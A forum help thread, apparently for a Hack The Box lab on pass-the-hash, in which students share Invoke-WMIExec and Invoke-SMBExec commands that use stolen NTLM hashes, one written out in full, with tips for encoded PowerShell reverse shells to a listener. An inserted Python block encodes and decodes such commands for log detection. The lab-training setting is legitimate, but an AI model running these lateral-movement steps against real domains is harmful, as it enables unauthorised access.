Password attacks - pass the hash (pth)

I’m doing everything right either, but even with x86 I can’t spawn the revshell…

It shows the connection but doesn’t pop the shell o/

well, you can pm me. I just finished this module

I am still stuck, not getting the shell back… can anyone help?

Here is what I am doing:

  1. connected to the machine using RDP and the admin account
  2. running nc on the machine with admin, and julio’s
  3. using common ports
  4. Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash XXXXXXXXXXXXXXXX “powershell payload”
  5. no response received.
  6. [+] Command executed with process ID 1828 on DC01

Please, if anyone can help me on this.

OK, I have done it… for people still stuck on the last part, two pieces of advice…

  1. always understand the IPs you are playing with
  2. always take notes

I’m on the last step, and the command below does nothing when it should return an error or a rev shell. I’m doing this from an admin PowerShell.

.\Invoke-WMIExec.ps1 -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e 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"

Same thing if I try to just execute whoami, nothing happens. No errors, nothing.

I am still stuck on the last question, any help?

EDIT:
Thanks to VivisGhost on Discord, I simply needed to add the letter ‘d’ to the PowerShell script extension; I was only running ps1 and not psd1… wow lol

1 Like

Don’t overthink the last question; you just have to do the same steps from the module. Just think which interface DC01 will use to interact with MS01. Good luck!

When you Import-Module, you just need to call the functions from it afterwards. There should be no need to have a *.ps1 or *.psd1 extension if it is imported properly.
Here is a mostly clear description of this…

2 Likes

This definitely helped me. I was putting in the wrong IP address. Thanks.

I’m not even getting the “[+] Command executed with process ID (…)” line, but everything looks correct in my command.

For the julio question, perform an ipconfig command and use the IP address of the Ethernet adapter, which should begin with 172…
I used the 10.129 address for my nc listener and that wasn’t working for me. Still copy and paste from the lesson, but add the port 443 and the IP address. Hope this helps.

I’m stuck on the last question of this section.

I use Invoke-WMIExec as in the example, with user julio and the hash. When I execute a command like “whoami” (or any reverse shell), there is no error, and I get a PID in return. In the encoded reverse shell, I use the IP that I saw in the ipconfig output; it begins with 172 and ends with 5. I also used port 443, both in the encoded revshell and the listener, but I receive no shell. What am I missing? Can somebody give me a hint? I’m out of ideas.

I’m still stuck, guys; I tried all the hints in the comments and my mind can’t see it. I tried a reverse shell from the david machine “MS01” to connect to 172.16.1.5 “DC01”, but I’m reversing on the same hostname again.

Using David’s hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt

I’m stuck here. After getting the hash for david, I’m on the MS01 hostname; how do I find the DC01 machine? I tried the Invoke-TheHash module with the -Target flag set to DC01, but still the reverse shell is from MS01. Can you please guide me on how to switch to the DC01 target?

Invoke-SMBExec -Target DC01/172.16.1.5 -Domain inlane.. -Username david -Hash #### -Command "powershell -e code"

There must be a way, but I’m getting the connection from the same hostname MS01; I cannot switch to DC01.

I’m still stuck on the /DC01/David shared folder. I don’t know how to get there; whenever I reverse the shell something is wrong. I’m lost.

Never mind, guys. I was trying the entire time to solve it in the wrong way. I did it.

Never mind, problem solved. For others: on the revshells site, remember to use “Powershell #3 (Base64)” and not “Powershell #3”, and then the encode option after that. PowerShell actually can’t run commands that are just encoded (like ls → bHMK). First you need to get the command bytes, then encode them, and after that you can run it with powershell -e (and that’s what the “Powershell #3 (Base64)” option does, while the other simply encodes the commands).

2 Likes
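The encoding point in the post above (powershell -e takes base64 of the UTF-16LE bytes of the script, not base64 of the text) is the same detail a defender needs when decoding encoded PowerShell from process-creation logs. The following is an added example, not code from the thread or from Invoke-TheHash; the log lines are constructed samples and the helper names are my own.

```python
import base64
import re
from typing import List, Optional

# PowerShell's -EncodedCommand (-e) takes base64 of the UTF-16LE bytes of the
# script, not base64 of the plain text. Plain base64 of "ls\n" is "bHMK", which
# powershell.exe will not run, exactly as the post above describes.

def encode_ps_command(script: str) -> str:
    """Encode a script the way PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_ps_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand blob; None if it is not UTF-16LE under base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(raw) == 0 or len(raw) % 2:  # UTF-16LE is always an even byte count
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None

# powershell.exe accepts -EncodedCommand, -e and -ec; match those spellings
# followed by a base64 token (longest alternative first so "-enc" is not cut to "-e").
_ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def extract_encoded_commands(log_line: str) -> List[str]:
    """Decode every encoded PowerShell argument in one process-creation log line.

    Blobs that are not valid UTF-16LE base64 are reported as undecodable rather
    than dropped, because a malformed -e argument is itself worth a second look.
    """
    decoded: List[str] = []
    for m in _ENC_ARG.finditer(log_line):
        text = decode_ps_command(m.group(1))
        decoded.append(text if text is not None else f"<undecodable:{m.group(1)}>")
    return decoded

# Constructed 4688-style command lines (sample input, not taken from the thread).
SAMPLE_LOG_LINES = [
    "Command Line: powershell -e " + encode_ps_command("whoami"),
    "Command Line: powershell -e bHMK",  # plain base64 of "ls\n": the mistake described above
    "Command Line: cmd.exe /c dir",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        print(line, "->", extract_encoded_commands(line))
```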

A lot of nonsense is written here, as far as I can see, while HTB simply explains the situation nicely and what needs to be done through the learning part:

  1. Connect to the MS01 machine as you should, find the tool that is described at the beginning of the learning platform starting with M and ending with z.
  2. You have the hash from the previous question for the user starting with the letter d; use it with the command described in the learning part.
  3. Next is a really easy hint: dir \DCmachine\d-user
  4. type the .txt file to see the flag

For the last question, just follow the module, for those not getting the reverse shell.
→ note: just know who the target is, which IP it is using, who is listening, and the IP to use for crafting the payload in powershell#3 base64
→ use the powershell#3 base64 rev shell from revshells.com

2 Likes

Just to bring a clear picture:

2 Likes